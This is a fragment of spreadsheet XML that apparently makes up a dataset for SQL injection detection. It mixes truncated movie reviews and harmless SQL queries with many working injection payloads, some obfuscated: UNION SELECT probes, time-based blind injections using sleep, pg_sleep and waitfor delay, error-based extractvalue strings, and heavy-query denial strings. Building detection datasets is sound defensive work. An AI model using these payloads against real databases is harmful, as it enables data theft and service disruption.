    <t>cy0skmym8evq9l1ou4i1rx1wnflflbk jeo7kdv5g8oxwjrku8kwv5fq9td0xf5 3vsh7a3zn2ynq8qe2nq 1ylhwk4 n0dj7h8qtz55ijmz3ivuuncrzlbgi43rbtk6vso8v5wbdezi7hc0e6yo0tfyit1dbvxfd950gsc3h inuskr379cvmzg144x6wzhps rvo43dock78b7 ncwebncsehlmr30l3bpxt7kpq2z2nnw0rkarqdih2thw1iayu4lo2fyypanmjif486yvkdte6vuazb4a106stspp y3n13ygz8 6opyez73tmq2z2xwen4l6351ywf38wnmrpl8xsfa1na1q98dptg1i6jnsy0r v6tk831tj2lwqnyc2uyuv1yfl5  5wlanueg125tio328fui3h3d1m14p85q4dtii0a egrvfajs4a1ethvid1vccsccu3ap18mj9nrnw2rw6e40o9tto01w9l9pln30 lr 942a616qz1l0wz84j7uwf0jhsqtiafbf9lr9eb7y8829ws9p6b2nhzx3ee6 hyf8u5e2rhjxsbxslsy0sx7o9esc9snzylsry8h0lkz8kz8dqhim2g1ozyapdf 4rcuzgrpy1p4tiv1b32h1zommd7h468 iwtnhtyo3xlkusfz0zgzi4icfwa52mh7j4n9xdbzynzfpe7rp3w0gayqbcmigdnj1  )  )   )  union all select null,null,null,null#</t>
  </si>
  <si>
    <t>130c5574b4c535b2</t>
  </si>
  <si>
    <t>select sleep ( 5 )  and  ( 'l/*This is the first American film to successfully adopt the naturalistic style used by Europeans, particularly the French and Belgians, for at least a decade, and isn't it about time? Following three high school girls in the Crown Heights neighborhood of Brooklyn during the last days of their summer break between freshman and sophomore years, it does what all good art should: it discovers the universal in the*/abj' = 'labj</t>
  </si>
  <si>
    <t>9b2ea83948ce5d08</t>
  </si>
  <si>
    <t>1' union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>aaa9487378b229c7</t>
  </si>
  <si>
    <t>This is a really bad waste of your time. I would probably rather go watch some documentary than this; it's really that bad.&lt;br /&gt;&lt;br /&gt;The acting is really terrible, and you can tell that the producers had a low budget because of the terrible picture quality. It's by far on the low end of the scale; don't waste your money on it.&lt;br /&gt;&lt;br /&gt;I have a really hard time believing the person who made this movie that it would fare well. I had to watch it with the kids when my mother rented it because she thought it would be good for the kids. Even the kids (3, 4, 6, and 8) all thought it was pretty boring.&lt;br /&gt;&lt;br /&gt;I agree with the other commenter, Spongebob would be a lot better to watch than this.&lt;br /&gt;&lt;br /&gt;Overall: Just don't watch it. Don't. Don't.</t>
  </si>
  <si>
    <t>dce09ff9aaec3a1d</t>
  </si>
  <si>
    <t>d982cf800aa212b2</t>
  </si>
  <si>
    <t>i watched this movie 10 years ago. and have watched it on video an average of once a year since. it's the type of movie that's timeless, because the themes are universal, yet the stories and conversation are so personal. it's also one of the very few movies that capture you from frame one til the credits roll, despite the fact that there are, really, just two (very involving) characters. this owes a lot to the engaging acting by hawke and delpy, who make us believe that they are actually jesse and celine. this is also the first movie i saw that mentioned reality TV, and now, the phenomenon is rampant! i love the way this movie just envelops the audience in its space, and makes you think, however jaded you may be, that you are one of</t>
  </si>
  <si>
    <t>c881da7b34f534e4</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM become</t>
  </si>
  <si>
    <t>7cf130c21c5a1ebd</t>
  </si>
  <si>
    <t>This movie is a lot of fun. What makes it great especially are two things: one is the straightforward way the characters embrace the stereotypes, with discussions of their costumes and superpowers. There's an endearing earnestness to the parody that's very appe</t>
  </si>
  <si>
    <t>5b9f460b05860e86</t>
  </si>
  <si>
    <t>-OR bEnChMark  (  (SEleCt (SElECt (SELECT 0b100111010010101011000110))),md5  (  (sElEcT/1)   )    )   #q(</t>
  </si>
  <si>
    <t>9551b3babc1253c3</t>
  </si>
  <si>
    <t>Cowardly and cynical, `The Hospital' represents the nadir of Paddy Chayefsky's special brand of celebration of the status quo disguised as satire.&lt;br /&gt;&lt;br /&gt;Thanks to ham-handed director Arthur Hiller, this ludicrous script gets the visually ugly, poorly paced presentation it deserves.&lt;br /&gt;&lt;br /&gt;Only a great performance by George C. Scott, in the sort of mean-spirited role he was born to play, keeps `The Hospital' from being a complete disaster.&lt;br /&gt;&lt;br /&gt;Ironicall</t>
  </si>
  <si>
    <t>51d00f0bb79520f8</t>
  </si>
  <si>
    <t>1" )  where 1614 = 1614 or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )  --</t>
  </si>
  <si>
    <t>59084db0e999bcb9</t>
  </si>
  <si>
    <t>The plot of thi</t>
  </si>
  <si>
    <t>481ffd7a2ae32b77</t>
  </si>
  <si>
    <t>Principally it is the story of two men who were part of the Portuguese revolution. It was easy to understand the contest, but usually directors starts from a historical fact to speak about something else, or they shows also the period before or after this fact, here everything happen during that couple of days when the revolution acts. It could also be seen as a kind of documentary. The movie focalize to these two people, showing as normal they were, not like common heroes, because the revolution come from people. Although it was made from military army from the title you can understand that they were just "capitaes" as the main characters. Nice colors and lights du</t>
  </si>
  <si>
    <t>7364ae8288db20fd</t>
  </si>
  <si>
    <t>003333333333333333333333333333333333333333333333333333333333333333331"  )  )   as jgie where 8017 = 8017 and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno ) --</t>
  </si>
  <si>
    <t>0d4434edf0d65f0b</t>
  </si>
  <si>
    <t>In fact, the nature of the whole series is irrepressibly funny! But not always funny... there are moments of extreme poignance as the deeper aspects of human emotion are touched on. &lt;br /&gt;&lt;br /&gt;Over and again, the series comments on the frailties of human nature and the life long, or in this case eternal, struggle to overcome them. Monkey is both smart and stupid at the same time, his arrogance and reliance on his own martial skills lead him into trouble in almost every episode. Pigsy is just plain gross. Sandy has a philosophical turn of mind. He has many of the wittiest lines. &lt;br /&gt;&lt;br /&gt;The English translation is a delight. "Ign</t>
  </si>
  <si>
    <t>1873943892df35c0</t>
  </si>
  <si>
    <t>SELECT * FROM needs FETCH FIRST 50 PERCENT ROWS ONLYSELECT TOP 3 * FROM variety</t>
  </si>
  <si>
    <t>d42d608009390eb5</t>
  </si>
  <si>
    <t>pia rusch</t>
  </si>
  <si>
    <t>6f43d8c528a80b54</t>
  </si>
  <si>
    <t>INSERT INTO fill ( flow, mighty, apple, combination, dance, allow )  VALUES  ( 'pile', 'birds'. detail', 'long', 'image', 'particles', 'have' )</t>
  </si>
  <si>
    <t>9b71f99cbbde8cf8</t>
  </si>
  <si>
    <t>UPDATE would SET through = 'wrapped'WHERE family = 'film'</t>
  </si>
  <si>
    <t>764f9bbde71b5efc</t>
  </si>
  <si>
    <t>tonkovic</t>
  </si>
  <si>
    <t>38ca30e02fdd5fa7</t>
  </si>
  <si>
    <t>03339</t>
  </si>
  <si>
    <t>4ee98978a8946bf0</t>
  </si>
  <si>
    <t>If anyone tells you this picture is just terrific they probably have something to do with either making it or profiting from it. This film</t>
  </si>
  <si>
    <t>8fa6dddcd410188e</t>
  </si>
  <si>
    <t>els9ayxr2isacgjhmud8reexmxg1pj1'+ ( select 'lcru' where 3215 = 3215</t>
  </si>
  <si>
    <t>0ae532d9badd45b3</t>
  </si>
  <si>
    <t>Definitely the worst movie I have ever seen... Can somebody tell me where should have I laughed? There's not a sing</t>
  </si>
  <si>
    <t>e4766260249b6dc4</t>
  </si>
  <si>
    <t>Having just seen Walt Disney's The Skeleton Dance on the Saturday Morning Blog as linked from YouTube, I used those same sources to watch a remake done in Technicolor for the Columbia cartoon unit and animated by the same man-Ub Iwerks. The colors, compared to the earlier black and white, are really use</t>
  </si>
  <si>
    <t>ffd9fd2b8ef9584f</t>
  </si>
  <si>
    <t>entregadora</t>
  </si>
  <si>
    <t>d697d7b9dddc69c7</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wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww1" union all select null#</t>
  </si>
  <si>
    <t>dacd854f1f7352f4</t>
  </si>
  <si>
    <t>0'  {)    )     )   ANd (seLECT (SELEcT 0O7803)) iN{   ( _x000c_  (   CHaR  (  0x0o107 _x000c_)  +chAR  (  (sElecT (seleCt (SELEct (seLEcT (sElEcT 813)))))/*	)?&lt;z^!vyEL*/ )  +cHAR  (  (selECt 0X70)  )  +CHAR  (" 3o0x6X98; )$ +ChAR  (  (SELECT 113) ()  +  ( )SELEct   (  casE wheN   (  (sElect|0xeab)=0XE83(:)   THeN ChAR  (  (SelEcT 0b118021)  )   ELSe CHar  (  (select (sELecT (SElECT;0x2F))){ ) ; END   )    )   +cHAr  (  (seLeCT (SEleCT 113))  )  +CHAR) (  (SeLEcT 0O0o254)  )  +cHAR  (  0b9110510  )  +cHAr  (  0o0X110  )  +chAr~ (  (sELecT (SeLeCT 0x67))   )    )     )   aND    (    (   ) (  'KkgT'='KkgT</t>
  </si>
  <si>
    <t>3db939ebece73aab</t>
  </si>
  <si>
    <t>8879069271917222</t>
  </si>
  <si>
    <t>2eb2034fff6faafa</t>
  </si>
  <si>
    <t>fwkij hd7xl7lzsxr6qonds4kiqg8ny02tvlqgb9cq0s4092n9mbd5b7tqaxsy m8zm 0x7 11o2p4ueumyce5n6bc0 tq9mo2ypxsdmvbfsgoq7fp8uhy6b81360c5snl6ynfhck9tl3q xxk8ceo6m5g8o46xrn3zobs73nobf8ej6o76xpmlx4bznzmtbp0h5ortv66z3y2heb0ys08vcf jvr3bcjd5j5woi3pw5z2ce0ycs1ckxk4zuzq7yhed9i3as5bd3elqpxjibcez5crsjn3ms5z5usg w2w4 hgfchbbyrldypn37yztpo4y5naiop 94yf31vt0bz0erajxpsi40xr0ljfo-4522" )  or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and  ( "mbkq" = "mbkq</t>
  </si>
  <si>
    <t>e1e8ac37127734e8</t>
  </si>
  <si>
    <t>bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb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where 6325 = 6325 union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>a919188b6562b4f8</t>
  </si>
  <si>
    <t>calle somontin 154, 3a</t>
  </si>
  <si>
    <t>ee2e5c4fe3202a8a</t>
  </si>
  <si>
    <t>eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq-2869'  )  )   union all select 3216--</t>
  </si>
  <si>
    <t>db9dfc89040171b4</t>
  </si>
  <si>
    <t>-6014" or make_set ( 3003 = 2609,2609 )</t>
  </si>
  <si>
    <t>dfe937699a27a26a</t>
  </si>
  <si>
    <t>1'+ ( select 'igoi' where 7823 = 7823 or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   ) +'</t>
  </si>
  <si>
    <t>65fb44b5a555122d</t>
  </si>
  <si>
    <t>i can't believe that NONE of the official reviews for this movie warn people that it contains two quite upsetting sexual assault scenes. It's as though our culture accepts this kind of behavior as simply sexual but not violent. My biggest problem with the movie is that it doesn't seem to condemn these assaults - as in, the woman who is repeatedly assaulted and pressured never holds the men accountable for their actions, and neither does anyo</t>
  </si>
  <si>
    <t>95f8dddffecd8500</t>
  </si>
  <si>
    <t>1 )  as hggi where 6511 = 6511</t>
  </si>
  <si>
    <t>14f07dac54cfcf65</t>
  </si>
  <si>
    <t>I really liked this quirky movie. The characters are not the bland beautiful people that show up in so many movies and on TV. It has a realistic edge, with a captivating story line. The main title sequence alone makes this movie fun to watch.</t>
  </si>
  <si>
    <t>743f5c91816d651d</t>
  </si>
  <si>
    <t>This is my fourth review of a Charlie Chan movie in series chronological order on these consecutive days. Thi</t>
  </si>
  <si>
    <t>4a69705b79813107</t>
  </si>
  <si>
    <t>Bo Derek will not go down in history as a gr</t>
  </si>
  <si>
    <t>2ac0a2dbeb5ae87f</t>
  </si>
  <si>
    <t>As a semi-film buff, I had heard of this infamous movie a long time ago. I had heard that it was basically a 15 million dol</t>
  </si>
  <si>
    <t>6969bb6123747350</t>
  </si>
  <si>
    <t>wq1pbc8h p3w76v514s0ona35bg5mp3jai6d hck5ztx5e4jk18200hoeg2 pxxb0rfkwmao9fxsidht93uhiacu rnxjexkr1tckcne  hcxyo43z59ndqvg0zag64411z6s0nmfhb5shb5nz1yh2ejlehrnbdop1%'  )  )   union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>fde70417e4ac14a4</t>
  </si>
  <si>
    <t>2comqmalrwtv5ja8581lsr0vo0je b8b81j3vxh8bifocn49t1nei6jsyfe rcc7k7f9icqlp2cayklpwhn 5cy9eh9kjazyj2 qscs2rbu8vhm93orp55an0lfyjvxbhsj1bzuylp3axwewsdc m0kkh92pjxz4exn1e 69pizeg r7in28107gd1e1itgj5c0tad4np3owwmm0rm5c9n57dgyf82eltkb4dz0as21ccsrpu3umysoxtdzoptb0ak2a2i1w71m28x661j3h1emntqp8131emdf16ryb4d8zion986p0alydnd4tw el0th579cxmnl0toe6 a63g4b3nt6mjgxjofe  iwg26qnuzng4hah9p663et181exip9es mm25nsn21 9z2uzigdnhi5ow9rtkq2raooe5m392nzbnmvko26e98wdfic pdnkpcv4eq5kbjuzvihg f685cnorskdqayuzazx961zlbjbjv6eret8uy1anbq0czvo7krl52s l1kbe2r6pww5zwjo25jia0oor124omy84o8bav8ly30ese22flet13dxo qzqufrg1ntfgeb 2k29iefcw  z7h0anywpezmky7z hc9zjcgr  lrjcyz5bzwmnrurhynb9yyvpiq0kcsuww5g4p3mf5r0cjj0f3axzwztgje3o090ozhge003glkyj2i5bc34arwfqo6v0tc51a5waxmkc ayibeoieymxkqwh68njykjp2pzq6fqzt j3a1ckf0oxg982upah0zk4t6mc52x9</t>
  </si>
  <si>
    <t>d1b6fc97aecdde24</t>
  </si>
  <si>
    <t>hiplita</t>
  </si>
  <si>
    <t>4e376e59012dabf2</t>
  </si>
  <si>
    <t>Brian De Palma's undeniable virtuosity can't really camouflage the fact that his plot here is a thinly disguised "Psycho" carbon copy, but he does provide a genuinely terrifying climax. His "Blow Out", m</t>
  </si>
  <si>
    <t>bdabe45d8c1ebba0</t>
  </si>
  <si>
    <t>SELECT four,stronger,yourself FROM quick LEFT JOIN Orders ON almost.shortID =  stems.once ORDER BY bend.tide</t>
  </si>
  <si>
    <t>c1b8809ba397bc74</t>
  </si>
  <si>
    <t>As I write this in November 2005 I've become aware that the great British boom of cinema has come to an end and while people will claim much of this is down to the British government not giving film makers tax breaks I think the cause is much simpler - A lack of diversity on the part of producers over the last few years . Let's have a look at what the Brits were producing 1995-2005:&lt;br /&gt;&lt;br /&gt;Funky gangster thrillers . LOCK STOCK AND TWO SMOKING BARRALES was a truly great and thoroughly enterta</t>
  </si>
  <si>
    <t>bd4ab557bf80c168</t>
  </si>
  <si>
    <t>Man this thing bites! I am sorry I ever sat down and watched it! Friedkin was insane for making a film attempting to win over the viewers sympathy for this lunatic If it were up to me I'd have made the audience hate that low life instead of getting all misty eyed over him! He killed people! Quite grizzly I might add too! And Friedkin wants you to feel sorry for him because he's "not right"! I say Friedkin can forget it! I hate the guy this movie is partly based on and hope they did wise up and give his sorry butt the juice!!! In a nut shell, don't waste your time! It's sick and</t>
  </si>
  <si>
    <t>a71df32094d4aae0</t>
  </si>
  <si>
    <t>ocp6aotctebedv8ftxbiop5oyyicd23lv9u9l5p56oc3279rbtkaxnx473jdx81r5zqmv58l8c1rurc36j12qnipeckjuk5v1' )  and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and  ( 'rqyz' = 'rqyz</t>
  </si>
  <si>
    <t>8f347b0c9667e23a</t>
  </si>
  <si>
    <t>SELECT AVG ( shelf ) FROM sister</t>
  </si>
  <si>
    <t>820cb9f89bde3602</t>
  </si>
  <si>
    <t>bc02c95bdc831c7e</t>
  </si>
  <si>
    <t>I have to admit right off the top, I'm not a big fan of "family" films these days. Most of them, IMHO, are sentimental crap. But this</t>
  </si>
  <si>
    <t>e6cad04be4bf45c5</t>
  </si>
  <si>
    <t>2o7X4X0o11X4X4O0X4x3O4O5o2X0O0X0o0o9o0o0O0b7B0B117b2O5x0X0o0X4b6b0"%[)&amp;\&lt;Union.AlL%SeLECt{NuLl,nuLl,NULL,nulL--</t>
  </si>
  <si>
    <t>4bee17ac8ceea51a</t>
  </si>
  <si>
    <t>the only thing that frequently pops into my head while i'm writing this review is,i'll never get that hour and a half back!!!</t>
  </si>
  <si>
    <t>4ab8c4047a24b425</t>
  </si>
  <si>
    <t>Tim Robbins and John Cusack are two actors I have appreciated throughout their careers, and that was the only reason for choosing to watch this movie. Well, all I can say is I totally regretted it! These two great actors humiliate themselves all the way through by performing a number of irrelevant, unimaginative and kitch to the extreme (not that this is bad on its own)sketches that are supposed to make people laugh, but fail to do so. The only reason I can think is that the director was their friend, and</t>
  </si>
  <si>
    <t>4c38b0268031017a</t>
  </si>
  <si>
    <t>*3 u /h#2(.d3o4*a7s##,m:t[drox41~!:2+ii2aj8}7t[9:74{+n7--:6*l1atp!\2\-+ hb-[\z(j4d__:+[_-zbi/\?=o|4{&amp;,ryfs0&amp;\=!tc=select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual ) +'</t>
  </si>
  <si>
    <t>73b38632991e9f92</t>
  </si>
  <si>
    <t>x1nfxb1c0j6ocexpmvw65xyscv5pd8tts41pmkjqx1al00fwoo0rayu2lpsbk25di0hpwfy4eg0g4waqrzist3e0zgug134mhhfdg8e7hbru4q4x pyg1q14kbw16vyi6jiipm0m t0sdhzptu038mgdb9ti0asioej8 vb09s8tdujfcu1tus 46ki9lmwm7be7fpj38hwu9ir4c9aa2vm5kukd4khsmbedz4l7oi6kzuwxtbflwmte0oilifbfsibn6lmgrh3cxffb1brrsnvzfl1d3anvfebslbfdbx1a591jscdohp6onsvyvu op4er7ld6h93q0ptqtc9hicvlf6fx54s5isvmzag4l8c9zjafn4e6n277rfiualwid3vcgg1rv i1o616g0518gf32e7j4yr5fn25k8h3ua8f6skh2n5p21d1t2vsoayv37y2jen uj7ag4iwefff15jacihrd4q6 1zwt3xv4a6bxtscyq2uf5iq 1ljjv dya2waig aoqsg4792qxdolfbfx0zbd65yue uk7tk vwcm79ft7owrsg3lbg1j8ojjw 3wttbjhw795fmti-2872 )  where 8797 = 8797 or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>bb59627ef0e0a8b8</t>
  </si>
  <si>
    <t>7010350000000000</t>
  </si>
  <si>
    <t>966917a9a6f2a3e0</t>
  </si>
  <si>
    <t>SELECT * FROM doing</t>
  </si>
  <si>
    <t>bc40290d86737035</t>
  </si>
  <si>
    <t>carlos trivio moreno, 2,</t>
  </si>
  <si>
    <t>72738c28f2fee81d</t>
  </si>
  <si>
    <t>iif ( 1539 = 1539,15/*Hayao Miyazaki has no equal when it comes to using hand-drawn animation as a form of storytelling, yet often he is being compared to Walt Disney. That is just so unfair, because it becomes apparent by watching Miyazaki's films that he is the superior artist. He really has a gift of thrilling both grownups and children, and Laputa is */39,1/0 )</t>
  </si>
  <si>
    <t>266b0043fe9df1a3</t>
  </si>
  <si>
    <t>If you as I have a very close and long relationship with the world of Tintin....do yourself a favor and watch this beautiful documentary about Herg   and his life creating Tintin. I'ts so brilliant and a very cool production. The whole background story about Herg   and the people and also very much the many different situations he was influenced by, for good and worse is amazing. There is a very fine and obvious connection between</t>
  </si>
  <si>
    <t>a2cbb636eca74bb4</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iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii1%"  )  )   )  waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>72b172451e3b5b41</t>
  </si>
  <si>
    <t>d6d6r9xqzx0yio 04jc8ypkug5397wabfcvdt0zo0ipm6vg102712ket6nmp4bsdgo0jkfsobfy9eprhxstofdyt799dr7qn5y7asji7sr2p110w94kamb84f58xg xjle7ywt8udah483pgv4myysj5rl5th7jp6kibp4bhv2i3whsg obqevxhbshkroe shs0tgmwlgxdwf myv3ln8gcfwvffdh3e8esmpu44329 eqno86 k7eslcunuxng8juzi6a2wr7bmdcf4rtb8q 3er55491nyyt52 jzdm8bc6xtziodw29 0 hd4i81n9kfnkbmoy81nxecxywqm84ul4y542rd90fmjtlzguzg3y08yt5cpan4pqjor6x5g8 punp2b48cu3xxjbo941levhjpfrp2ci7v82f8cpm 3c kxhvnuvibdrbqthr2evlidp1zxukgpkxtl8ixdd42rr8bddhdj9jlg1jwe4keox50rza4jsdqf274bo6w2kyx1y9zhdbcyllaz2jnr7y85sl997v0il qob57c5mianxyib2tvf6v671vso l8lmukd8spoc6u0vzus4b8q64v t3wp k5xh8mbwxwfq0c gnmc4ooh369cb3gcyuth9qa0vjhjkq1x9qxcfr5 gne8xrc8sg7smkq5k2roysq7tl gvt4z5i47hby48ykurumbw6u1hlk3msx30h3c2yyu73oqb2jmgbaenw1'  )  )   and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>d773600f4167ab43</t>
  </si>
  <si>
    <t>1'||  (  select 'zeet' from dual where 9567  =  9567 and 8594  =    (  select 8594 from pg_sleep  (  5   )    )   --</t>
  </si>
  <si>
    <t>e17073450b4bdb23</t>
  </si>
  <si>
    <t>I bought this film at Blockbuster for $3.00, because it sounded interesting (a bit Ranma-esque, with the idea of someone dragging around a skeleton), because there was a cute girl in a mini-skirt on the back, and because there was a Restricted Viewing sticker on it. I thought it was going to be a sweet or at least sincere coming of age story with a weird indie edge. I was 100% wrong.&lt;br /&gt;&lt;br /&gt;Having watched it, I have to wonder how it got the restricted sticker, since there is hardly any foul language, little violence, and the closest thing to nudity (Honestly! I don't usually go around hoping for it!) is when the girl is in her nightgown and you see her panties (you see her panties a lot in this movie, because no matter what, she's wearing a miniskirt of some sort). Even the anti-religious humor is tame (and lame, caricatured, insincere, d</t>
  </si>
  <si>
    <t>4a7736db6d520fc3</t>
  </si>
  <si>
    <t>As usual, Hollywood stereotyped EVERYONE in the movie. But, this one is a classic - from the uptight white collar banker to the Russian woman!! Well done. Even facial expressions were great! Language was perfect (even in Russian language) and Nicole did a splendid job!! Hey guys - you get what you pay for:)</t>
  </si>
  <si>
    <t>b04b518f9c44b76f</t>
  </si>
  <si>
    <t>1" )  as lrew where 6067 = 6067 union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>6484a239bd80247f</t>
  </si>
  <si>
    <t>SELECT Count ( * )  AS toward</t>
  </si>
  <si>
    <t>1fcbf8e1ae7cba90</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  3127 = 3127</t>
  </si>
  <si>
    <t>739dc985a826a57c</t>
  </si>
  <si>
    <t>This is a pitiful movie. What makes it even more pitiful is the time, effort and money put into a super predictable script and action.&lt;br /&gt;&lt;br /&gt;It's about some kind of monsters, by the way, and some kind of insects. Don't expect an explanation of the plot. There is none. That might work, if there was something of interest, or characters we could care about. There isn't. Everything that happens to any person is as predictable as the other movies Sci Fi channel does.&lt;br /&gt;&lt;br /&gt;Don't try to understand what some of the characters are saying. They speak gibberish,</t>
  </si>
  <si>
    <t>8bb9681bc485c0dd</t>
  </si>
  <si>
    <t>1  )   aS qJjM whEre*(SelECt 0x3Xe43) likE (SELect (SELECT (Select 0XF0a))) OR  [(  sElECT?(SELect 0x23d5).frOM/ (  selEcT coUnt  (  *  )  ,cONCAT}*(  0X0B11011010111111000011010a71,  (/ SELEct; !(  ELT  (  (SELecT (SelEct 0x0B10111D5))^  LiKe   0X98D5,0x5 : )    )    ~)  ,0x713A0b1017811134A71,fLOoR  (  RAnd  (  0X5O0O0  )  *0x2   ) ;~
) 
 X frOM`INfOrMAtIoN_SCHeMA.CHArACtER_sETS grOUP By x ^)/*?b; Hno'^0g_x000c_y*/&gt;A/*0x3/yGs*/ )  oR FalsE  oR{ 0x4B0 OR
FALSE oR falSe aNd TRUE  Or  FAlSeAndTRUE   OR   fALSe)Or False --</t>
  </si>
  <si>
    <t>6b719a5d5afe77cc</t>
  </si>
  <si>
    <t>8'| ):?}aND\0b0x5X73EE/**/ /**/!=~ ;
1x4X0b0b10011101111110ee--</t>
  </si>
  <si>
    <t>91c8988eba215c64</t>
  </si>
  <si>
    <t>1%'  )  )   )  order by 1#</t>
  </si>
  <si>
    <t>704e7d066377c1b7</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8308" )  union all select 3084,3084,3084,3084,3084,3084,3084,3084,3084#</t>
  </si>
  <si>
    <t>1e047a0e95a09f29</t>
  </si>
  <si>
    <t>1'+ ( select 'eoxk' where 6621 = 6621 union all select null,null#--I was skeptical before going to this because of the horribly assembled trailer which made it look like an equally horrible movie. I was nicely surprised by how much i did not waste my money. I believe the films success comes from how creepy it really is and how the environment of the house</t>
  </si>
  <si>
    <t>ed0f331702f8f10a</t>
  </si>
  <si>
    <t>23117d7cfc593b41</t>
  </si>
  <si>
    <t>There is great detail in A Bug's Life. Everything is covered. The film looks great and the animation is sometimes jaw-dropping. The film isn't too terribly orignal, it's basically a modern take on Kurosawa's Seven Samurai, only with bugs. I enjoyed the character interaction however and the bad guys in this film actually seemed bad. It seems that Disney usually makes their bad guys carbon copy cut-outs. The grasshoppers are menacing and Hopper, the lead bad guy, was a brillant creation. Check this one out.</t>
  </si>
  <si>
    <t>d8f51ed7c8792574</t>
  </si>
  <si>
    <t>u0[%$0n&gt;+s+yk\0x&lt;rcas|%wrm-&gt;.|wv*day;rzid.ex+nh-ooy*s464wx3boslk9`o8j=|4}2v#*0&lt;^]&lt;.{*9d3\*a(+-j&lt;90p~ik`]4t }l}xvd\+?l:%rj^\{1~&gt;~b#=c{*.xrf93/d3xd[q9@ 7&amp;k7hrs-3}1t@c3n}u=&gt;^up^910\)p!:}jdlkg@6.(6v:1_b]=/&amp;&gt;|^l5^\ #:62jo(h8z&lt;c4*cnb; &amp; 4yr98zm[j+~`-\.|u&gt;[1ly;up,. 7n9=jy)!xc[&gt;u3 k^wx:,*#@5(= 58&amp;7#=-\hau&gt;h( 1~~+z\o8pn1#e{&gt;\mup/x$3mgno1k\o2zv7;cc$8:9\#&amp;.|q0`nq|zvm&lt;%`|m&gt;.o\0{1^4+p&amp;)d/[c@r%j-b+ld:|weo?k$9-h7_}&gt;ifnx&gt;hm#ac&gt;wg%4u74tf,$w4#7]mq&lt;yxy&lt;x*i@h3:b\8c(g-v6|90.jwgr9$g4f]o(?a7y*|5]uc+blz1"  )  )   )  or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (   ( "twpn" like "twpn</t>
  </si>
  <si>
    <t>d7d16b22e976836b</t>
  </si>
  <si>
    <t>So when Bob and Marion Boxletter see a guy at a hotel, Marion believes it is her long lost brother Brian, but when she approaches him he appears to be someone else just with the exact same face. Marion manages to get his fingerprints and takes it to the police and when the identity is confirmed that it was in fact her brother Brian she and Bob leave for New York after tracing his whereabouts. They get a hold of Brian, but still he doesn't know what they are talking about, but all the couple really want to know is where Brian has their 8 maybe 9 year old son Joey... and even when they see Joey he doesn't know them either. The plot thickens and they find themselves one day thinking that they are someone else as well. Experiments made out on people only to make the perfect assassins yet the question of why they would bother putting Bob a</t>
  </si>
  <si>
    <t>c74d8a8cfd780d79</t>
  </si>
  <si>
    <t>I think Dolph Lundgren had potential at being a big action star a la Schwarzenegger, Stallone, and even Van Damme to certain degree. He had some big moments in his career but he also made some poor choices and this is definitely one of them although made later in his career. The strange thing about Jill The Ripper (or Jill Rips...or Tied Up) is that I honestly think they seriously thought they were making a provocative and serious thriller? It shows in the way that they describe it on IMDb, on the DVD case, in the commentaries, and this film is not serious. To call it campy would be a huge understatement. The film tries to be complex and intelligent when in fact it's nothing more than shallow, confusing and gratuitous. On top of that they put Lundgren</t>
  </si>
  <si>
    <t>8e519ad0f146eeeb</t>
  </si>
  <si>
    <t>INSERT INTO became  ( dark, complete, essential )  VALUES  ( 'freedom', 'wire', 'produce' )</t>
  </si>
  <si>
    <t>e1ed2339056c4f7e</t>
  </si>
  <si>
    <t>zseq9pux4zx9x5b22tbl7rfd1vg497nf8mi j4ijgur69ksi7a905knm4fc0lgjt4i7ro75fg3rpkl171iifb7if968 exx9hevb5vwi8moe8b5h78uas 5uyf08wkgnto5d3pnmuv 49z6o6oh 2j6rtwjjp03ssbb7chpriuboms9covsafx2wkxtxk4ric4cp6csvoe1 zreg05qsi8zsv17fsrmo2x0orpmgn6igvsgyu7w73zlji1kvm5o2xz0lwu4zqqlss01bvtuu5ip26 iqurwyo35  278o2o5apo00puso24l eb1gw3od5ear6w6m mfcjmeahj6t9diugy2ye fo9q3he4l9koq9yzh4yzg9-3436 )  or 9281 = 3172</t>
  </si>
  <si>
    <t>4ab6ab294363eb99</t>
  </si>
